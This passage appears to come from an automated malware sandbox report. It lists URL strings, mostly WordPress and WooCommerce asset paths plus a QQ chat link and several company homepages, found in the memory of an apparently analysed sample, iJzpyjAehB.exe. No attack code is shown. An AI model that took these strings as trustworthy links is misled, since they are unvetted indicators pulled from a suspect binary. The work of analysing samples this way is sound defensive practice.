                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/css.css?ver=2.1.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/js.js?ver=2.1.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/css.css?ver=2.1.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/js.js?ver=2.1.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/js.min.js?ver=2.1.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/css.css?ver=2.1.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/js.js?ver=2.1.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.4.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.4.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.6.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.6.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-theme-child/style.css?ver=1.0.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-158.css?ver=1678289175
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=1676407198
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-410.css?ver=1676407198
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-501.css?ver=1676407198
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=26698c2509d8a9f37e69
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=26698c2509d8a9f37e69464f
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=26698c2509d8a9f37e69464fa
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/underscore.min.js?ver=1.13.4
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26698c2509d8a9f37e69464fad7be5f1
                      Source: iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.370327793.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://statcounter.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://wpa.qq.com/msgrd?v=3&uin=2938350997&site=qq&menu=yes
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.762justice.com
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007547000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/O
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/V
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.asdoptics.com
                      Source: pigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267371516.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?gif
